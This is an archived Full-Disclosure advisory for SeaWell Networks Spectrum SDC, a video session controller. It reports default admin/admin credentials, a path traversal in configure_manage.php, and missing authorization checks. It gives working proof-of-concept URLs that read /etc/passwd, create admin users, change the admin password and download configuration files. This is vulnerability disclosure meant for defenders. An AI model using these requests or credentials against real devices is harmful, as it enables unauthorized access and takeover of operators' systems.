lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAB8+WF2nZ=GVSUWX-8m+xEDsS+XULj4pyPDu3ZMEUpYw4gLbkg@mail.gmail.com>
Date: Mon, 18 Jan 2016 15:21:44 +0000
From: Karn Ganeshen <karnganeshen@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] SeaWell Networks Spectrum - Multiple Vulnerabilities

About SeaWell Networks Spectrum

Session Delivery Control

SeaWell set out to improve the way operators control, monetize and scale
their IP video offerings, to meet the growing subscriber demands for video
delivered to smartphones, tablets and game consoles.

The result – Spectrum – is what we call a “Multiscreen 2.0” Session
Delivery Controller.

Spectrum is high-performance, carrier-grade software that takes ABR video
and repackages it – on-the-fly – into any other protocol, including Apple
HLS, Adobe HDS, Microsoft Smooth Streaming and MPEG-DASH.

http://www.seawellnetworks.com/spectrum/

*Affected version*
Spectrum SDC 02.05.00
Build 02.05.00.0016
Copyright (c) 2015 SeaWell Networks Inc.

*A. CWE-255: Credentials Management*
*CVE-2015-8282*

Weak, default login credentials - admin / admin

*B. CWE-22: Improper Limitation of a Pathname to a Restricted Directory
('Path Traversal')*
*CVE-2015-8283*

The configure_manage.php module accepts a file parameter which takes an
unrestricted file path as input, allowing an attacker (non-admin, low-
privileged user) to read arbitrary files on the system.

*PoC:*

https://IP/configure_manage.php?action=download_config&file=../../../../../../../../../etc/passwd

*C. CWE-285: Improper Authorization*
*CVE-2015-8284*

A low privileged, non-admin user, with only viewer privileges, can perform
administrative functions, such as create, update, delete a user (including
admin user), or access device's configuration files (policy.xml,
cookie_config.xml, systemCfg.xml). The application lacks Authorization
controls to restrict any non-admin users from performing admin functions.

The application users can have admin or viewer privilege levels. Admin has
full access to the device. Viewer has access to very restricted functions.

It is possible for a viewer priv user to perform admin functions.

*PoC:*

Add new user [Admin function only]

GET
/system_manage.php?username=viewer&password=viewer&password=viewer&userlevel=1&action=add_user&ekey=&LActiveRow=
HTTP/1.1

https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=

Here

admin -> userlevel=9
viewer -> userlevel=1

*Create new user with Admin privs*
Log in as viewer - try create new admin user - viewer1

https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=

<result><returnCode>0</returnCode><returnMsg>*Success*
</returnMsg><loggedIn>1</loggedIn><payload/></result>

*Delete user*

https://IP/system_manage.php?username=viewer1&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4

*Modify existing user (including admin)*
log in as viewer - try change system (admin) user

https://IP/system_manage.php?username=system&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4

<result><returnCode>0</returnCode><returnMsg>*Success*
</returnMsg><loggedIn>1</loggedIn><payload/></result>

*Change Admin password*
log in as viewer - try change admin pass

https://IP/system_manage.php?username=admin&password=admin1&password=admin1&userlevel=9&action=update_user&ekey=3&LActiveRow=sys_Luser_3

<result><returnCode>0</returnCode><returnMsg>*Success*
</returnMsg><loggedIn>1</loggedIn><payload/></result>

*Downloading configuration xml files*

viewer priv user has no access/option to config xmls via GUI. It is
possible to download the configs by calling the url directly

*Access policy config xml*
https://IP/configure_manage.php?action=download_config&file=policy.xml

*Access cookie config xml*
https://IP/configure_manage.php?action=download_config&file=cookie_config.xml

*Access system config xml*
https://IP/configure_manage.php?action=download_config&file=systemCfg.xml

+++++
-- 
Best Regards,
Karn Ganeshen

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ